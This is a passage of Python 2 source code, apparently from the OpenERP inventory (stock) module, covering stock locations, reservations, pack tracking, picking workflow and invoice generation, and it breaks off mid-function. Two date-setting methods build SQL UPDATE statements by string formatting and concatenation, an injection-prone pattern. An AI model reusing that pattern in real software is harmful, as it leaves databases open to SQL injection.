'valuation_in_account_id': fields.many2one('account.account', 'Stock Valuation Account (Incoming)', domain = [('type','=','other')],
help="Used for real-time inventory valuation. When set on a virtual location (non internal type), "
"this account will be used to hold the value of products being moved from an internal location "
"into this location, instead of the generic Stock Output Account set on the product. "
"This has no effect for internal locations."),
'valuation_out_account_id': fields.many2one('account.account', 'Stock Valuation Account (Outgoing)', domain = [('type','=','other')],
help="Used for real-time inventory valuation. When set on a virtual location (non internal type), "
"this account will be used to hold the value of products being moved out of this location "
"and into an internal location, instead of the generic Stock Output Account set on the product. "
"This has no effect for internal locations."),
}
_defaults = {
'active': True,
'usage': 'internal',
'chained_location_type': 'none',
'chained_auto_packing': 'manual',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.location', context=c),
'posx': 0,
'posy': 0,
'posz': 0,
'icon': False,
'scrap_location': False,
}
def chained_location_get(self, cr, uid, location, partner=None, product=None, context=None):
""" Finds chained location
@param location: Location id
@param partner: Partner id
@param product: Product id
@return: List of values
"""
result = None
if location.chained_location_type == 'customer':
if partner:
result = partner.property_stock_customer
else:
loc_id = self.pool['res.partner'].default_get(cr, uid, ['property_stock_customer'], context=context)['property_stock_customer']
result = self.pool['stock.location'].browse(cr, uid, loc_id, context=context)
elif location.chained_location_type == 'fixed':
result = location.chained_location_id
if result:
return result, location.chained_auto_packing, location.chained_delay, location.chained_journal_id and location.chained_journal_id.id or False, location.chained_company_id and location.chained_company_id.id or False, location.chained_picking_type, False
return result
def picking_type_get(self, cr, uid, from_location, to_location, context=None):
""" Gets type of picking.
@param from_location: Source location
@param to_location: Destination location
@return: Location type
"""
result = 'internal'
if (from_location.usage=='internal') and (to_location and to_location.usage in ('customer', 'supplier')):
result = 'out'
elif (from_location.usage in ('supplier', 'customer')) and (to_location.usage == 'internal'):
result = 'in'
return result
def _product_get_all_report(self, cr, uid, ids, product_ids=False, context=None):
return self._product_get_report(cr, uid, ids, product_ids, context, recursive=True)
def _product_get_report(self, cr, uid, ids, product_ids=False,
context=None, recursive=False):
""" Finds the product quantity and price for particular location.
@param product_ids: Ids of product
@param recursive: True or False
@return: Dictionary of values
"""
if context is None:
context = {}
product_obj = self.pool.get('product.product')
# Take the user company and pricetype
context['currency_id'] = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.currency_id.id
# To be able to offer recursive or non-recursive reports we need to prevent recursive quantities by default
context['compute_child'] = False
if not product_ids:
product_ids = product_obj.search(cr, uid, [], context={'active_test': False})
products = product_obj.browse(cr, uid, product_ids, context=context)
products_by_uom = {}
products_by_id = {}
for product in products:
products_by_uom.setdefault(product.uom_id.id, [])
products_by_uom[product.uom_id.id].append(product)
products_by_id.setdefault(product.id, [])
products_by_id[product.id] = product
result = {}
result['product'] = []
for id in ids:
quantity_total = 0.0
total_price = 0.0
for uom_id in products_by_uom.keys():
fnc = self._product_get
if recursive:
fnc = self._product_all_get
ctx = context.copy()
ctx['uom'] = uom_id
qty = fnc(cr, uid, id, [x.id for x in products_by_uom[uom_id]],
context=ctx)
for product_id in qty.keys():
if not qty[product_id]:
continue
product = products_by_id[product_id]
quantity_total += qty[product_id]
# Compute based on pricetype
# Choose the right filed standard_price to read
amount_unit = product.price_get('standard_price', context=context)[product.id]
price = qty[product_id] * amount_unit
total_price += price
result['product'].append({
'price': amount_unit,
'prod_name': product.name,
'code': product.default_code, # used by lot_overview_all report!
'variants': product.variants or '',
'uom': product.uom_id.name,
'prod_qty': qty[product_id],
'price_value': price,
})
result['total'] = quantity_total
result['total_price'] = total_price
return result
def _product_get_multi_location(self, cr, uid, ids, product_ids=False, context=None,
states=['done'], what=('in', 'out')):
"""
@param product_ids: Ids of product
@param states: List of states
@param what: Tuple of
@return:
"""
product_obj = self.pool.get('product.product')
if context is None:
context = {}
context.update({
'states': states,
'what': what,
'location': ids
})
return product_obj.get_product_available(cr, uid, product_ids, context=context)
def _product_get(self, cr, uid, id, product_ids=False, context=None, states=None):
"""
@param product_ids:
@param states:
@return:
"""
if states is None:
states = ['done']
ids = id and [id] or []
return self._product_get_multi_location(cr, uid, ids, product_ids, context=context, states=states)
def _product_all_get(self, cr, uid, id, product_ids=False, context=None, states=None):
if states is None:
states = ['done']
# build the list of ids of children of the location given by id
ids = id and [id] or []
location_ids = self.search(cr, uid, [('location_id', 'child_of', ids)])
return self._product_get_multi_location(cr, uid, location_ids, product_ids, context, states)
def _product_virtual_get(self, cr, uid, id, product_ids=False, context=None, states=None):
if states is None:
states = ['done']
return self._product_all_get(cr, uid, id, product_ids, context, ['confirmed', 'waiting', 'assigned', 'done'])
def _product_reserve(self, cr, uid, ids, product_id, product_qty, context=None, lock=False):
"""
Attempt to find a quantity ``product_qty`` (in the product's default uom or the uom passed in ``context``) of product ``product_id``
in locations with id ``ids`` and their child locations. If ``lock`` is True, the stock.move lines
of product with id ``product_id`` in the searched location will be write-locked using Postgres's
"FOR UPDATE NOWAIT" option until the transaction is committed or rolled back, to prevent reservin
twice the same products.
If ``lock`` is True and the lock cannot be obtained (because another transaction has locked some of
the same stock.move lines), a log line will be output and False will be returned, as if there was
not enough stock.
:param product_id: Id of product to reserve
:param product_qty: Quantity of product to reserve (in the product's default uom or the uom passed in ``context``)
:param lock: if True, the stock.move lines of product with id ``product_id`` in all locations (and children locations) with ``ids`` will
be write-locked using postgres's "FOR UPDATE NOWAIT" option until the transaction is committed or rolled back. This is
to prevent reserving twice the same products.
:param context: optional context dictionary: if a 'uom' key is present it will be used instead of the default product uom to
compute the ``product_qty`` and in the return value.
:return: List of tuples in the form (qty, location_id) with the (partial) quantities that can be taken in each location to
reach the requested product_qty (``qty`` is expressed in the default uom of the product), of False if enough
products could not be found, or the lock could not be obtained (and ``lock`` was True).
"""
result = []
amount = 0.0
if context is None:
context = {}
uom_obj = self.pool.get('product.uom')
uom_rounding = self.pool.get('product.product').browse(cr, uid, product_id, context=context).uom_id.rounding
if context.get('uom'):
uom_rounding = uom_obj.browse(cr, uid, context.get('uom'), context=context).rounding
locations_ids = self.search(cr, uid, [('location_id', 'child_of', ids)])
if locations_ids:
# Fetch only the locations in which this product has ever been processed (in or out)
cr.execute("""SELECT l.id FROM stock_location l WHERE l.id in %s AND
EXISTS (SELECT 1 FROM stock_move m WHERE m.product_id = %s
AND ((state = 'done' AND m.location_dest_id = l.id)
OR (state in ('done','assigned') AND m.location_id = l.id)))
""", (tuple(locations_ids), product_id,))
locations_ids = [i for (i,) in cr.fetchall()]
for id in locations_ids:
if lock:
try:
# Must lock with a separate select query because FOR UPDATE can't be used with
# aggregation/group by's (when individual rows aren't identifiable).
# We use a SAVEPOINT to be able to rollback this part of the transaction without
# failing the whole transaction in case the LOCK cannot be acquired.
cr.execute("SAVEPOINT stock_location_product_reserve")
cr.execute("""SELECT id FROM stock_move
WHERE product_id=%s AND
(
(location_dest_id=%s AND
location_id<>%s AND
state='done')
OR
(location_id=%s AND
location_dest_id<>%s AND
state in ('done', 'assigned'))
)
FOR UPDATE of stock_move NOWAIT""", (product_id, id, id, id, id), log_exceptions=False)
except Exception:
# Here it's likely that the FOR UPDATE NOWAIT failed to get the LOCK,
# so we ROLLBACK to the SAVEPOINT to restore the transaction to its earlier
# state, we return False as if the products were not available, and log it:
cr.execute("ROLLBACK TO stock_location_product_reserve")
_logger.warning("Failed attempt to reserve %s x product %s, likely due to another transaction already in progress. Next attempt is likely to work. Detailed error available at DEBUG level.", product_qty, product_id)
_logger.debug("Trace of the failed product reservation attempt: ", exc_info=True)
return False
# XXX TODO: rewrite this with one single query, possibly even the quantity conversion
cr.execute("""SELECT product_uom, sum(product_qty) AS product_qty
FROM stock_move
WHERE location_dest_id=%s AND
location_id<>%s AND
product_id=%s AND
state='done'
GROUP BY product_uom
""",
(id, id, product_id))
results = cr.dictfetchall()
cr.execute("""SELECT product_uom,-sum(product_qty) AS product_qty
FROM stock_move
WHERE location_id=%s AND
location_dest_id<>%s AND
product_id=%s AND
state in ('done', 'assigned')
GROUP BY product_uom
""",
(id, id, product_id))
results += cr.dictfetchall()
total = 0.0
results2 = 0.0
for r in results:
amount = uom_obj._compute_qty(cr, uid, r['product_uom'], r['product_qty'], context.get('uom', False))
results2 += amount
total += amount
if total <= 0.0:
continue
amount = results2
compare_qty = float_compare(amount, 0, precision_rounding=uom_rounding)
if compare_qty == 1:
if amount > min(total, product_qty):
amount = min(product_qty, total)
result.append((amount, id))
product_qty -= amount
total -= amount
if product_qty <= 0.0:
return result
if total <= 0.0:
continue
return False
stock_location()
class stock_tracking(osv.osv):
_name = "stock.tracking"
_description = "Packs"
def checksum(sscc):
salt = '31' * 8 + '3'
sum = 0
for sscc_part, salt_part in zip(sscc, salt):
sum += int(sscc_part) * int(salt_part)
return (10 - (sum % 10)) % 10
checksum = staticmethod(checksum)
def make_sscc(self, cr, uid, context=None):
sequence = self.pool.get('ir.sequence').get(cr, uid, 'stock.lot.tracking')
try:
return sequence + str(self.checksum(sequence))
except Exception:
return sequence
_columns = {
'name': fields.char('Pack Reference', size=64, required=True, select=True, help="By default, the pack reference is generated following the sscc standard. (Serial number + 1 check digit)"),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide a pack without deleting it."),
'serial': fields.char('Additional Reference', size=64, select=True, help="Other reference or serial number"),
'move_ids': fields.one2many('stock.move', 'tracking_id', 'Moves for this pack', readonly=True),
'date': fields.datetime('Creation Date', required=True),
}
_defaults = {
'active': 1,
'name': make_sscc,
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
}
def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = self.search(cr, user, [('serial', '=', name)]+ args, limit=limit, context=context)
ids += self.search(cr, user, [('name', operator, name)]+ args, limit=limit, context=context)
return self.name_get(cr, user, ids, context)
def name_get(self, cr, uid, ids, context=None):
"""Append the serial to the name"""
if not len(ids):
return []
res = [ (r['id'], r['serial'] and '%s [%s]' % (r['name'], r['serial'])
or r['name'] )
for r in self.read(cr, uid, ids, ['name', 'serial'],
context=context) ]
return res
def unlink(self, cr, uid, ids, context=None):
raise osv.except_osv(_('Error!'), _('You cannot remove a lot line.'))
def action_traceability(self, cr, uid, ids, context=None):
""" It traces the information of a product
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return: A dictionary of values
"""
return self.pool.get('action.traceability').action_traceability(cr,uid,ids,context)
stock_tracking()
#----------------------------------------------------------
# Stock Picking
#----------------------------------------------------------
class stock_picking(osv.osv):
_name = "stock.picking"
_inherit = ['mail.thread']
_description = "Picking List"
_order = "id desc"
def _set_maximum_date(self, cr, uid, ids, name, value, arg, context=None):
""" Calculates planned date if it is greater than 'value'.
@param name: Name of field
@param value: Value of field
@param arg: User defined argument
@return: True or False
"""
if not value:
return False
if isinstance(ids, (int, long)):
ids = [ids]
for pick in self.browse(cr, uid, ids, context=context):
sql_str = """update stock_move set
date_expected='%s'
where
picking_id=%d """ % (value, pick.id)
if pick.max_date:
sql_str += " and (date_expected='" + pick.max_date + "')"
cr.execute(sql_str)
return True
def _set_minimum_date(self, cr, uid, ids, name, value, arg, context=None):
""" Calculates planned date if it is less than 'value'.
@param name: Name of field
@param value: Value of field
@param arg: User defined argument
@return: True or False
"""
if not value:
return False
if isinstance(ids, (int, long)):
ids = [ids]
for pick in self.browse(cr, uid, ids, context=context):
sql_str = """update stock_move set
date_expected='%s'
where
picking_id=%s """ % (value, pick.id)
if pick.min_date:
sql_str += " and (date_expected='" + pick.min_date + "')"
cr.execute(sql_str)
return True
def get_min_max_date(self, cr, uid, ids, field_name, arg, context=None):
""" Finds minimum and maximum dates for picking.
@return: Dictionary of values
"""
res = {}
for id in ids:
res[id] = {'min_date': False, 'max_date': False}
if not ids:
return res
cr.execute("""select
picking_id,
min(date_expected),
max(date_expected)
from
stock_move
where
picking_id IN %s
group by
picking_id""",(tuple(ids),))
for pick, dt1, dt2 in cr.fetchall():
res[pick]['min_date'] = dt1
res[pick]['max_date'] = dt2
return res
def create(self, cr, user, vals, context=None):
if ('name' not in vals) or (vals.get('name')=='/'):
seq_obj_name = self._name
vals['name'] = self.pool.get('ir.sequence').get(cr, user, seq_obj_name)
new_id = super(stock_picking, self).create(cr, user, vals, context)
return new_id
_columns = {
'name': fields.char('Reference', size=64, select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'origin': fields.char('Source Document', size=64, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Reference of the document", select=True),
'backorder_id': fields.many2one('stock.picking', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
'type': fields.selection([('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], 'Shipping Type', required=True, select=True, help="Shipping type specify, goods coming in or going out."),
'note': fields.text('Notes', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'stock_journal_id': fields.many2one('stock.journal','Stock Journal', select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'location_id': fields.many2one('stock.location', 'Location', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Keep empty if you produce at the location where the finished products are needed." \
"Set a location if you produce at a fixed location. This can be a partner location " \
"if you subcontract the manufacturing operations.", select=True),
'location_dest_id': fields.many2one('stock.location', 'Dest. Location', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Location where the system will stock the finished products.", select=True),
'move_type': fields.selection([('direct', 'Partial'), ('one', 'All at once')], 'Delivery Method', required=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="It specifies goods to be deliver partially or all at once"),
'state': fields.selection([
('draft', 'Draft'),
('cancel', 'Cancelled'),
('auto', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('assigned', 'Ready to Transfer'),
('done', 'Transferred'),
], 'Status', readonly=True, select=True, track_visibility='onchange', help="""
* Draft: not confirmed yet and will not be scheduled until confirmed\n
* Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
* Waiting Availability: still waiting for the availability of products\n
* Ready to Transfer: products reserved, simply waiting for confirmation.\n
* Transferred: has been processed, can't be modified or cancelled anymore\n
* Cancelled: has been cancelled, can't be confirmed anymore"""
),
'min_date': fields.function(get_min_max_date, fnct_inv=_set_minimum_date, multi="min_max_date",
store=True, type='datetime', string='Scheduled Time', select=1, help="Scheduled time for the shipment to be processed"),
'date': fields.datetime('Creation Date', help="Creation date, usually the time of the order.", select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'date_done': fields.datetime('Date of Transfer', help="Date of Completion", states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'max_date': fields.function(get_min_max_date, fnct_inv=_set_maximum_date, multi="min_max_date",
store=True, type='datetime', string='Max. Expected Date', select=2),
'move_lines': fields.one2many('stock.move', 'picking_id', 'Internal Moves', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}),
'product_id': fields.related('move_lines', 'product_id', type='many2one', relation='product.product', string='Product'),
'auto_picking': fields.boolean('Auto-Picking', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'partner_id': fields.many2one('res.partner', 'Partner', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
'invoice_state': fields.selection([
("invoiced", "Invoiced"),
("2binvoiced", "To Be Invoiced"),
("none", "Not Applicable")], "Invoice Control",
select=True, required=True, readonly=True, track_visibility='onchange', states={'draft': [('readonly', False)]}),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
}
_defaults = {
'name': lambda self, cr, uid, context: '/',
'state': 'draft',
'move_type': 'direct',
'type': 'internal',
'invoice_state': 'none',
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.picking', context=c)
}
_sql_constraints = [
('name_uniq', 'unique(name, company_id)', 'Reference must be unique per Company!'),
]
def action_process(self, cr, uid, ids, context=None):
if context is None:
context = {}
"""Open the partial picking wizard"""
context.update({
'active_model': self._name,
'active_ids': ids,
'active_id': len(ids) and ids[0] or False
})
return {
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.partial.picking',
'type': 'ir.actions.act_window',
'target': 'new',
'context': context,
'nodestroy': True,
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
default = default.copy()
picking_obj = self.browse(cr, uid, id, context=context)
if ('name' not in default) or (picking_obj.name == '/'):
seq_obj_name = 'stock.picking.' + picking_obj.type
default['name'] = self.pool.get('ir.sequence').get(cr, uid, seq_obj_name)
default.setdefault('origin', False)
default.setdefault('backorder_id', False)
if 'invoice_state' not in default and picking_obj.invoice_state == 'invoiced':
default['invoice_state'] = '2binvoiced'
res = super(stock_picking, self).copy(cr, uid, id, default, context)
return res
def fields_view_get(self, cr, uid, view_id=None, view_type=False, context=None, toolbar=False, submenu=False):
if view_type == 'form' and not view_id:
mod_obj = self.pool.get('ir.model.data')
if self._name == "stock.picking.in":
model, view_id = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_in_form')
if self._name == "stock.picking.out":
model, view_id = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_out_form')
return super(stock_picking, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)
def onchange_partner_in(self, cr, uid, ids, partner_id=None, context=None):
return {}
def action_explode(self, cr, uid, moves, context=None):
"""Hook to allow other modules to split the moves of a picking."""
return moves
def action_confirm(self, cr, uid, ids, context=None):
""" Confirms picking.
@return: True
"""
pickings = self.browse(cr, uid, ids, context=context)
self.write(cr, uid, ids, {'state': 'confirmed'})
todo = []
for picking in pickings:
for r in picking.move_lines:
if r.state == 'draft':
todo.append(r.id)
todo = self.action_explode(cr, uid, todo, context)
if len(todo):
self.pool.get('stock.move').action_confirm(cr, uid, todo, context=context)
return True
def test_auto_picking(self, cr, uid, ids):
# TODO: Check locations to see if in the same location ?
return True
def action_assign(self, cr, uid, ids, *args):
""" Changes state of picking to available if all moves are confirmed.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids):
if pick.state == 'draft':
wf_service.trg_validate(uid, 'stock.picking', pick.id, 'button_confirm', cr)
move_ids = [x.id for x in pick.move_lines if x.state == 'confirmed']
if not move_ids:
raise osv.except_osv(_('Warning!'),_('Not enough stock, unable to reserve the products.'))
self.pool.get('stock.move').action_assign(cr, uid, move_ids)
return True
def force_assign(self, cr, uid, ids, *args):
""" Changes state of picking to available if moves are confirmed or waiting.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids):
move_ids = [x.id for x in pick.move_lines if x.state in ['confirmed','waiting']]
self.pool.get('stock.move').force_assign(cr, uid, move_ids)
wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
return True
def draft_force_assign(self, cr, uid, ids, *args):
""" Confirms picking directly from draft state.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids):
if not pick.move_lines:
raise osv.except_osv(_('Error!'),_('You cannot process picking without stock moves.'))
wf_service.trg_validate(uid, 'stock.picking', pick.id,
'button_confirm', cr)
return True
def draft_validate(self, cr, uid, ids, context=None):
""" Validates picking directly from draft state.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
self.draft_force_assign(cr, uid, ids)
for pick in self.browse(cr, uid, ids, context=context):
move_ids = [x.id for x in pick.move_lines]
self.pool.get('stock.move').force_assign(cr, uid, move_ids)
wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
return self.action_process(
cr, uid, ids, context=context)
def cancel_assign(self, cr, uid, ids, *args):
""" Cancels picking and moves.
@return: True
"""
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids):
move_ids = [x.id for x in pick.move_lines]
self.pool.get('stock.move').cancel_assign(cr, uid, move_ids)
wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
return True
def action_assign_wkf(self, cr, uid, ids, context=None):
""" Changes picking state to assigned.
@return: True
"""
self.write(cr, uid, ids, {'state': 'assigned'})
return True
def test_finished(self, cr, uid, ids):
""" Tests whether the move is in done or cancel state or not.
@return: True or False
"""
move_ids = self.pool.get('stock.move').search(cr, uid, [('picking_id', 'in', ids)])
for move in self.pool.get('stock.move').browse(cr, uid, move_ids):
if move.state not in ('done', 'cancel'):
if move.product_qty != 0.0:
return False
else:
move.write({'state': 'done'})
return True
def test_assigned(self, cr, uid, ids):
""" Tests whether the move is in assigned state or not.
@return: True or False
"""
#TOFIX: assignment of move lines should be call before testing assigment otherwise picking never gone in assign state
ok = True
for pick in self.browse(cr, uid, ids):
mt = pick.move_type
# incomming shipments are always set as available if they aren't chained
if pick.type == 'in':
if all([x.state != 'waiting' for x in pick.move_lines]):
return True
for move in pick.move_lines:
if (move.state in ('confirmed', 'draft')) and (mt == 'one'):
return False
if (mt == 'direct') and (move.state == 'assigned') and (move.product_qty):
return True
ok = ok and (move.state in ('cancel', 'done', 'assigned'))
return ok
def action_cancel(self, cr, uid, ids, context=None):
""" Changes picking state to cancel.
@return: True
"""
for pick in self.browse(cr, uid, ids, context=context):
ids2 = [move.id for move in pick.move_lines]
self.pool.get('stock.move').action_cancel(cr, uid, ids2, context)
self.write(cr, uid, ids, {'state': 'cancel', 'invoice_state': 'none'})
return True
#
# TODO: change and create a move if not parents
#
def action_done(self, cr, uid, ids, context=None):
"""Changes picking state to done.
This method is called at the end of the workflow by the activity "done".
@return: True
"""
for picking in self.browse(cr, uid, ids, context=context):
values = {
'state': 'done'
}
if not picking.date_done:
values['date_done'] = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
picking.write(values)
return True
def action_move(self, cr, uid, ids, context=None):
"""Process the Stock Moves of the Picking
This method is called by the workflow by the activity "move".
Normally that happens when the signal button_done is received (button
"Done" pressed on a Picking view).
@return: True
"""
for pick in self.browse(cr, uid, ids, context=context):
todo = []
for move in pick.move_lines:
if move.state == 'draft':
self.pool.get('stock.move').action_confirm(cr, uid, [move.id],
context=context)
todo.append(move.id)
elif move.state in ('assigned','confirmed'):
todo.append(move.id)
if len(todo):
self.pool.get('stock.move').action_done(cr, uid, todo,
context=context)
return True
def get_currency_id(self, cr, uid, picking):
return False
def _get_partner_to_invoice(self, cr, uid, picking, context=None):
""" Gets the partner that will be invoiced
Note that this function is inherited in the sale and purchase modules
@param picking: object of the picking for which we are selecting the partner to invoice
@return: object of the partner to invoice
"""
return picking.partner_id and picking.partner_id.id
def _get_comment_invoice(self, cr, uid, picking):
"""
@return: comment string for invoice
"""
return picking.note or ''
def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):
""" Gets price unit for invoice
@param move_line: Stock move lines
@param type: Type of invoice
@return: The price unit for the move line
"""
if context is None:
context = {}
if type in ('in_invoice', 'in_refund'):
# Take the user company and pricetype
context['currency_id'] = move_line.company_id.currency_id.id
amount_unit = move_line.product_id.price_get('standard_price', context=context)[move_line.product_id.id]
return amount_unit
else:
return move_line.product_id.list_price
def _get_discount_invoice(self, cr, uid, move_line):
'''Return the discount for the move line'''
return 0.0
def _get_taxes_invoice(self, cr, uid, move_line, type):
""" Gets taxes on invoice
@param move_line: Stock move lines
@param type: Type of invoice
@return: Taxes Ids for the move line
"""
if type in ('in_invoice', 'in_refund'):
taxes = move_line.product_id.supplier_taxes_id
else:
taxes = move_line.product_id.taxes_id
if move_line.picking_id and move_line.picking_id.partner_id and move_line.picking_id.partner_id.id:
return self.pool.get('account.fiscal.position').map_tax(
cr,
uid,
move_line.picking_id.partner_id.property_account_position,
taxes
)
else:
return map(lambda x: x.id, taxes)
def _get_account_analytic_invoice(self, cr, uid, picking, move_line):
return False
def _invoice_line_hook(self, cr, uid, move_line, invoice_line_id):
'''Call after the creation of the invoice line'''
return
def _invoice_hook(self, cr, uid, picking, invoice_id):
'''Call after the creation of the invoice'''
return
def _get_invoice_type(self, pick):
src_usage = dest_usage = None
inv_type = None
if pick.invoice_state == '2binvoiced':
if pick.move_lines:
src_usage = pick.move_lines[0].location_id.usage
dest_usage = pick.move_lines[0].location_dest_id.usage
if pick.type == 'out' and dest_usage == 'supplier':
inv_type = 'in_refund'
elif pick.type == 'out' and dest_usage == 'customer':
inv_type = 'out_invoice'
elif pick.type == 'in' and src_usage == 'supplier':
inv_type = 'in_invoice'
elif pick.type == 'in' and src_usage == 'customer':
inv_type = 'out_refund'
else:
inv_type = 'out_invoice'
return inv_type
def _prepare_invoice_group(self, cr, uid, picking, partner, invoice, context=None):
""" Builds the dict for grouped invoices
@param picking: picking object
@param partner: object of the partner to invoice (not used here, but may be usefull if this function is inherited)
@param invoice: object of the invoice that we are updating
@return: dict that will be used to update the invoice
"""
comment = self._get_comment_invoice(cr, uid, picking)
return {
'name': (invoice.name or '') + ', ' + (picking.name or ''),
'origin': (invoice.origin or '') + ', ' + (picking.name or '') + (picking.origin and (':' + picking.origin) or ''),
'comment': (comment and (invoice.comment and invoice.comment + "\n" + comment or comment)) or (invoice.comment and invoice.comment or ''),
'date_invoice': context.get('date_inv', False),
}
def _prepare_invoice(self, cr, uid, picking, partner, inv_type, journal_id, context=None):
""" Builds the dict containing the values for the invoice
@param picking: picking object
@param partner: object of the partner to invoice
@param inv_type: type of the invoice ('out_invoice', 'in_invoice', ...)
@param journal_id: ID of the accounting journal
@return: dict that will be used to create the invoice object
"""
if isinstance(partner, int):
partner = self.pool.get('res.partner').browse(cr, uid, partner, context=context)
if inv_type in ('out_invoice', 'out_refund'):
account_id = partner.property_account_receivable.id
payment_term = partner.property_payment_term.id or False
else:
account_id = partner.property_account_payable.id
payment_term = partner.property_supplier_payment_term.id or False
comment = self._get_comment_invoice(cr, uid, picking)
invoice_vals = {
'name': picking.name,
'origin': (picking.name or '') + (picking.origin and (':' + picking.origin) or ''),
'type': inv_type,
'account_id': account_id,
'partner_id': partner.id,
'comment': comment,
'payment_term': payment_term,
'fiscal_position': partner.property_account_position.id,
'date_invoice': context.get('date_inv', False),
'company_id': picking.company_id.id,
'user_id': uid,
}
cur_id = self.get_currency_id(cr, uid, picking)
if cur_id:
invoice_vals['currency_id'] = cur_id
if journal_id:
invoice_vals['journal_id'] = journal_id
return invoice_vals
def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id,
invoice_vals, context=None):
""" Builds the dict containing the values for the invoice line
@param group: True or False
@param picking: picking object
@param: move_line: move_line object
@param: invoice_id: ID of the related invoice
@param: invoice_vals: dict used to created the invoice
@return: dict that will be used to create the invoice line
"""
if group:
name = (picking.name or '') + '-' + move_line.name
else:
name = move_line.name
origin = move_line.picking_id.name or ''
if move_line.picking_id.origin:
origin += ':' + move_line.picking_id.origin
if invoice_vals['type'] in ('out_invoice', 'out_refund'):
account_id = move_line.product_id.property_account_income.id
if not account_id:
account_id = move_line.product_id.categ_id.\
property_account_income_categ.id
else:
account_id = move_line.product_id.property_account_expense.id
if not account_id:
account_id = move_line.product_id.categ_id.\
property_account_expense_categ.id
if invoice_vals['fiscal_position']:
fp_obj = self.pool.get('account.fiscal.position')
fiscal_position = fp_obj.browse(cr, uid, invoice_vals['fiscal_position'], context=context)
account_id = fp_obj.map_account(cr, uid, fiscal_position, account_id)
# set UoS if it's a sale and the picking doesn't have one
uos_id = move_line.product_uos and move_line.product_uos.id or False
if not uos_id and invoice_vals['type'] in ('out_invoice', 'out_refund'):
uos_id = move_line.product_uom.id
return {
'name': name,
'origin': origin,
'invoice_id': invoice_id,
'uos_id': uos_id,
'product_id': move_line.product_id.id,
'account_id': account_id,
'price_unit': self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type']),
'discount': self._get_discount_invoice(cr, uid, move_line),
'quantity': move_line.product_uos_qty or move_line.product_qty,
'invoice_line_tax_id': [(6, 0, self._get_taxes_invoice(cr, uid, move_line, invoice_vals['type']))],
'account_analytic_id': self._get_account_analytic_invoice(cr, uid, picking, move_line),
}
def action_invoice_create(self, cr, uid, ids, journal_id=False,
group=False, type='out_invoice', context=None):
""" Creates invoice based on the invoice state selected for picking.
@param journal_id: Id of journal
@param group: Whether to create a group invoice or not
@param type: Type invoice to be created
@return: Ids of created invoices for the pickings
"""
if context is None:
context = {}
invoice_obj = self.pool.get('account.invoice')
invoice_line_obj = self.pool.get('account.invoice.line')
partner_obj = self.pool.get('res.partner')
invoices_group = {}
res = {}
inv_type = type
for picking in self.browse(cr, uid, ids, context=context):
if picking.invoice_state != '2binvoiced':
continue
partner = self._get_partner_to_invoice(cr, uid, picking, context=context)
if isinstance(partner, int):
partner = partner_obj.browse(cr, uid, [partner], context=context)[0]
if not partner:
raise osv.except_osv(_('Error, no partner!'),
_('Please put a partner on the picking list if you want to generate invoice.'))
if not inv_type:
inv_type = self._get_invoice_type(picking)
invoice_vals = self._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)
if group and partner.id in invoices_group:
invoice_id = invoices_group[partner.id]
invoice = invoice_obj.browse(cr, uid, invoice_id)
invoice_vals_group = self._prepare_invoice_group(cr, uid, picking, partner, invoice, context=context)
invoice_obj.write(cr, uid, [invoice_id], invoice_vals_group, context=context)
else:
invoice_id = invoice_obj.create(cr, uid, invoice_vals, context=context)
invoices_group[partner.id] = invoice_id
res[picking.id] = invoice_id
for move_line in picking.move_lines:
if move_line.state == 'cancel':
continue
if move_line.scrapped:
# do no invoice scrapped products
continue
vals = self._prepare_invoice_line(cr, uid, group, picking, move_line,
invoice_id, invoice_vals, context=context)
if vals:
invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)
